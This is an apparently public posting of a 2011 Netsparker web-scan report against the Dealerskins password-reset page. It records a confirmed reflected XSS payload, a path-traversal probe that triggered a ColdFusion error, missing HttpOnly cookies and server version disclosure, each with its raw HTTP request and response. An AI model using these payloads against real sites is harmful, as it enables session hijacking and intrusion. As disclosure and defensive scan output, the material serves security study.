XSS, login.dealerskins.com, GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Private Reporting of Security Research is preferred for Online Service Providers



Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

Loading

Netsparker - Scan Report Summary
TARGET URL
http://login.dealerskins.com/Admin/Control/Pa...
SCAN DATE
6/20/2011 8:21:39 PM
REPORT DATE
6/21/2011 5:47:00 AM
SCAN DURATION
00:01:02

Total Requests

Average Speed

req/sec.
6
identified
4
confirmed
0
critical
3
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
17 %
LOW
33 %
INFORMATION
50 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/Admin/Control/PasswordForgot.cfm message GET Cross-site Scripting Yes
status POST Internal Server Error Yes
Cookie Not Marked As HttpOnly Yes
E-mail Address Disclosure No
IIS Version Disclosure No
Redirect Response BODY Is Too Large Yes
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /Admin/Control/PasswordForgot.cfm

/Admin/Control/PasswordForgot.cfm CONFIRMED

http://login.dealerskins.com/Admin/Control/PasswordForgot.cfm?message='%22--%3E%3C/style%3E%3C/scrip..

Parameters

Parameter Type Value
message GET '"--></style></script><script>alert(0x000016)</script>
CFID GET 15179655
CFTOKEN GET 73236482

Request

GET /Admin/Control/PasswordForgot.cfm?message='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000016)%3C/script%3E&CFID=15179655&CFTOKEN=73236482 HTTP/1.1
Referer: http://login.dealerskins.com/Admin/Control/PasswordForgot.cfm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.dealerskins.com
Cookie: CFID=15179655; CFTOKEN=73236482; BIGipServerdsadmin_http_pool=472079626.20480.0000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 21 Jun 2011 01:15:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
Content-Encoding:



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>





<title>Dealerskins Control Page</title>
<meta name="title" content="Dealerskins Control Page" />
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="rating" content="General" />
<meta name="language" content="english" />
<meta name="distribution" content="Global" />
<meta name="robots" content="noarchive" />
<meta name="robots" content="noindex,nofollow" />
<link rel="shortcut icon" href="/Images/favicon/favicon.ico" type="image/x-icon" />


<link rel="stylesheet" href="/Assets/Includes/css/common.css" type="text/css" />

















<link rel="stylesheet" href="/Assets/Includes/css/dealerskinsbackend.css" type="text/css" />


<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js" language="javascript"></script>
<script type="text/javascript" src="/Assets/Includes/scripts/swfobject/swfobject.js" language="javascript"></script>
<script type="text/javascript" src="/Assets/Includes/scripts/jq-plugins/jquery-swfobject/jquery.swfobject.js" language="javascript"></script>

<script type='text/javascript' src='/Assets/Includes/scripts/help/helpTextTrigger.js'></script>
</head>

<body>

<div class="outerHeader">
<div>Forgot Password</div>
</div>




<table align="center" width="700" class="bordertable" cellpadding="5">
<tr>
<td class="redbold" style="font-size: .8em;" colspan="2" align="center">
'"--></style></script><script>netsparker(0x000016)</script>
</td>
</tr>

</table><br />




<table align="center" width="700" class="bordertable">
<tr>
<td colspan="2" align="center">
Please enter your username and email on record.<br />
Your password will be reset, and the new password will be sent to your email address from support@dealerskins.com.
<br /><br />
If you still have problems please contact Dealer Support at 877-256-4259.
</td>
</tr>
</table><br />

<form name="form" method="post" action="PasswordForgot.cfm">
<input type="hidden" name="status" value="forgot" />
<table align="center" width="700" class="bordertable">
<tr>
<td align="right" width="38%">Username: </td>
<td width="62%"><input type="text" name="username" size="30" /></td>
</tr>
<tr>
<td align="right">Email: </td>
<td><input type="text" name="email" size="30" /></td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" value="submit" class="basicbutton" />
</td>
</tr>
</table>
</form>



</body>








<!--
// *** A2 ***
-->





</html>









Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /Admin/Control/PasswordForgot.cfm

/Admin/Control/PasswordForgot.cfm CONFIRMED

http://login.dealerskins.com/Admin/Control/PasswordForgot.cfm

Parameters

Parameter Type Value
email POST netsparker@example.com
status POST ../../../../../../../../../../proc/self/fd/2
username POST Smith

Request

POST /Admin/Control/PasswordForgot.cfm HTTP/1.1
Referer: http://login.dealerskins.com/Admin/Control/PasswordForgot.cfm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.dealerskins.com
Cookie: CFID=15179660; CFTOKEN=56557145; BIGipServerdsadmin_http_pool=472079626.20480.0000
Content-Length: 100
Accept-Encoding: gzip, deflate

email=netsparker%40example.com&status=../../../../../../../../../../proc/self/fd/2%00&username=Smith

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 21 Jun 2011 01:15:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
Content-Encoding:































<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">






















<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Element P.USRACCESSLEVEL is undefined in SESSION.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">

</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>





















<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>


<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">http://login.dealerskins.com/Admin/Control/PasswordForgot.cfm</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">20-Jun-11 09:15 PM</td>
</tr>
</table>
</td>
</tr>
</table>



</font>
</td>
</tr>
</table>
</body></html>







Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /Admin/Control/PasswordForgot.cfm

/Admin/Control/PasswordForgot.cfm CONFIRMED

http://login.dealerskins.com/Admin/Control/PasswordForgot.cfm

Identified Cookie

CFID

Request

GET /Admin/Control/PasswordForgot.cfm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.dealerskins.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 21 Jun 2011 01:15:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=15179653;expires=Thu, 13-Jun-2041 01:15:19 GMT;path=/,CFTOKEN=40574276;expires=Thu, 13-Jun-2041 01:15:19 GMT;path=/,BIGipServerdsadmin_http_pool=472079626.20480.0000; path=/
Content-Type: text/html; charset=UTF-8
Content-Encoding:



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>





<title>Dealerskins Control Page</title>
<meta name="title" content="Dealerskins Control Page" />
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="rating" content="General" />
<meta name="language" content="english" />
<meta name="distribution" content="Global" />
<meta name="robots" content="noarchive" />
<meta name="robots" content="noindex,nofollow" />
<link rel="shortcut icon" href="/Images/favicon/favicon.ico" type="image/x-icon" />


<link rel="stylesheet" href="/Assets/Includes/css/common.css" type="text/css" />

















<link rel="stylesheet" href="/Assets/Includes/css/dealerskinsbackend.css" type="text/css" />


<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js" language="javascript"></script>
<script type="text/javascript" src="/Assets/Includes/scripts/swfobject/swfobject.js" language="javascript"></script>
<script type="text/javascript" src="/Assets/Includes/scripts/jq-plugins/jquery-swfobject/jquery.swfobject.js" language="javascript"></script>

<script type='text/javascript' src='/Assets/Includes/scripts/help/helpTextTrigger.js'></script>
</head>

<body>

<div class="outerHeader">
<div>Forgot Password</div>
</div>







<table align="center" width="700" class="bordertable">
<tr>
<td colspan="2" align="center">
Please enter your username and email on record.<br />
Your password will be reset, and the new password will be sent to your email address from support@dealerskins.com.
<br /><br />
If you still have problems please contact Dealer Support at 877-256-4259.
</td>
</tr>
</table><br />

<form name="form" method="post" action="PasswordForgot.cfm">
<input type="hidden" name="status" value="forgot" />
<table align="center" width="700" class="bordertable">
<tr>
<td align="right" width="38%">Username: </td>
<td width="62%"><input type="text" name="username" size="30" /></td>
</tr>
<tr>
<td align="right">Email: </td>
<td><input type="text" name="email" size="30" /></td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" value="submit" class="basicbutton" />
</td>
</tr>
</table>
</form>



</body>








<!--
// *** A2 ***
-->





</html>









E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /Admin/Control/PasswordForgot.cfm

/Admin/Control/PasswordForgot.cfm

http://login.dealerskins.com/Admin/Control/PasswordForgot.cfm

Found E-mails

support@dealerskins.com

Request

GET /Admin/Control/PasswordForgot.cfm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.dealerskins.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 21 Jun 2011 01:15:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=15179652;expires=Thu, 13-Jun-2041 01:15:19 GMT;path=/,CFTOKEN=64168944;expires=Thu, 13-Jun-2041 01:15:19 GMT;path=/,BIGipServerdsadmin_http_pool=472079626.20480.0000; path=/
Content-Type: text/html; charset=UTF-8
Content-Encoding:



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>





<title>Dealerskins Control Page</title>
<meta name="title" content="Dealerskins Control Page" />
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="rating" content="General" />
<meta name="language" content="english" />
<meta name="distribution" content="Global" />
<meta name="robots" content="noarchive" />
<meta name="robots" content="noindex,nofollow" />
<link rel="shortcut icon" href="/Images/favicon/favicon.ico" type="image/x-icon" />


<link rel="stylesheet" href="/Assets/Includes/css/common.css" type="text/css" />

















<link rel="stylesheet" href="/Assets/Includes/css/dealerskinsbackend.css" type="text/css" />


<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js" language="javascript"></script>
<script type="text/javascript" src="/Assets/Includes/scripts/swfobject/swfobject.js" language="javascript"></script>
<script type="text/javascript" src="/Assets/Includes/scripts/jq-plugins/jquery-swfobject/jquery.swfobject.js" language="javascript"></script>

<script type='text/javascript' src='/Assets/Includes/scripts/help/helpTextTrigger.js'></script>
</head>

<body>

<div class="outerHeader">
<div>Forgot Password</div>
</div>







<table align="center" width="700" class="bordertable">
<tr>
<td colspan="2" align="center">
Please enter your username and email on record.<br />
Your password will be reset, and the new password will be sent to your email address from support@dealerskins.com.
<br /><br />
If you still have problems please contact Dealer Support at 877-256-4259.
</td>
</tr>
</table><br />

<form name="form" method="post" action="PasswordForgot.cfm">
<input type="hidden" name="status" value="forgot" />
<table align="center" width="700" class="bordertable">
<tr>
<td align="right" width="38%">Username: </td>
<td width="62%"><input type="text" name="username" size="30" /></td>
</tr>
<tr>
<td align="right">Email: </td>
<td><input type="text" name="email" size="30" /></td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" value="submit" class="basicbutton" />
</td>
</tr>
</table>
</form>



</body>








<!--
// *** A2 ***
-->





</html>









IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /Admin/Control/PasswordForgot.cfm

/Admin/Control/PasswordForgot.cfm

http://login.dealerskins.com/Admin/Control/PasswordForgot.cfm

Extracted Version

Microsoft-IIS/6.0

Request

GET /Admin/Control/PasswordForgot.cfm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.dealerskins.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 21 Jun 2011 01:15:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=15179652;expires=Thu, 13-Jun-2041 01:15:19 GMT;path=/,CFTOKEN=64168944;expires=Thu, 13-Jun-2041 01:15:19 GMT;path=/,BIGipServerdsadmin_http_pool=472079626.20480.0000; path=/
Content-Type: text/html; charset=UTF-8
Content-Encoding:



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>





<title>Dealerskins Control Page</title>
<meta name="title" content="Dealerskins Control Page" />
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="rating" content="General" />
<meta name="language" content="english" />
<meta name="distribution" content="Global" />
<meta name="robots" content="noarchive" />
<meta name="robots" content="noindex,nofollow" />
<link rel="shortcut icon" href="/Images/favicon/favicon.ico" type="image/x-icon" />


<link rel="stylesheet" href="/Assets/Includes/css/common.css" type="text/css" />

















<link rel="stylesheet" href="/Assets/Includes/css/dealerskinsbackend.css" type="text/css" />


<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js" language="javascript"></script>
<script type="text/javascript" src="/Assets/Includes/scripts/swfobject/swfobject.js" language="javascript"></script>
<script type="text/javascript" src="/Assets/Includes/scripts/jq-plugins/jquery-swfobject/jquery.swfobject.js" language="javascript"></script>

<script type='text/javascript' src='/Assets/Includes/scripts/help/helpTextTrigger.js'></script>
</head>

<body>

<div class="outerHeader">
<div>Forgot Password</div>
</div>







<table align="center" width="700" class="bordertable">
<tr>
<td colspan="2" align="center">
Please enter your username and email on record.<br />
Your password will be reset, and the new password will be sent to your email address from support@dealerskins.com.
<br /><br />
If you still have problems please contact Dealer Support at 877-256-4259.
</td>
</tr>
</table><br />

<form name="form" method="post" action="PasswordForgot.cfm">
<input type="hidden" name="status" value="forgot" />
<table align="center" width="700" class="bordertable">
<tr>
<td align="right" width="38%">Username: </td>
<td width="62%"><input type="text" name="username" size="30" /></td>
</tr>
<tr>
<td align="right">Email: </td>
<td><input type="text" name="email" size="30" /></td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" value="submit" class="basicbutton" />
</td>
</tr>
</table>
</form>



</body>








<!--
// *** A2 ***
-->





</html>









Redirect Response BODY Is Too Large

Redirect Response BODY Is Too Large

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the response from the page returned an HTTP Redirect Status but output more information than usual. This generally indicates that after redirect, page did not finish the response as it was supposed to.

Impact

This can lead serious issues such authentication bypass in authentication required pages, in other pages it generally indicates a programming error.

Remedy

Finish the HTTP Response after you redirect the user.

In ASP.NET use Response.Redirect("redirected-page.aspx", true); instead of Response.Redirect("redirected-page.aspx", false); In PHP applications call exit(); after you redirect the user.
- /Admin/Control/PasswordForgot.cfm

/Admin/Control/PasswordForgot.cfm CONFIRMED

http://login.dealerskins.com/Admin/Control/PasswordForgot.cfm

Request

POST /Admin/Control/PasswordForgot.cfm HTTP/1.1
Referer: http://login.dealerskins.com/Admin/Control/PasswordForgot.cfm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.dealerskins.com
Cookie: CFID=15179655; CFTOKEN=73236482; BIGipServerdsadmin_http_pool=472079626.20480.0000
Content-Length: 30
Accept-Encoding: gzip, deflate

email=&status=forgot&username=

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Tue, 21 Jun 2011 01:15:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
location: PasswordForgot.cfm?message=The data you entered does not match our records, please<br />check your information or contact Dealer Support.&CFID=15179655&CFTOKEN=73236482
Content-Type: text/html; charset=UTF-8
Content-Encoding:



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>





<title>Dealerskins Control Page</title>
<meta name="title" content="Dealerskins Control Page" />
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="rating" content="General" />
<meta name="language" content="english" />
<meta name="distribution" content="Global" />
<meta name="robots" content="noarchive" />
<meta name="robots" content="noindex,nofollow" />
<link rel="shortcut icon" href="/Images/favicon/favicon.ico" type="image/x-icon" />


<link rel="stylesheet" href="/Assets/Includes/css/common.css" type="text/css" />

















<link rel="stylesheet" href="/Assets/Includes/css/dealerskinsbackend.css" type="text/css" />


<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.4.min.js" language="javascript"></script>
<script type="text/javascript" src="/Assets/Includes/scripts/swfobject/swfobject.js" language="javascript"></script>
<script type="text/javascript" src="/Assets/Includes/scripts/jq-plugins/jquery-swfobject/jquery.swfobject.js" language="javascript"></script>

<script type='text/javascript' src='/Assets/Includes/scripts/help/helpTextTrigger.js'></script>
</head>

<body>

<div class="outerHeader">
<div>Forgot Password</div>
</div>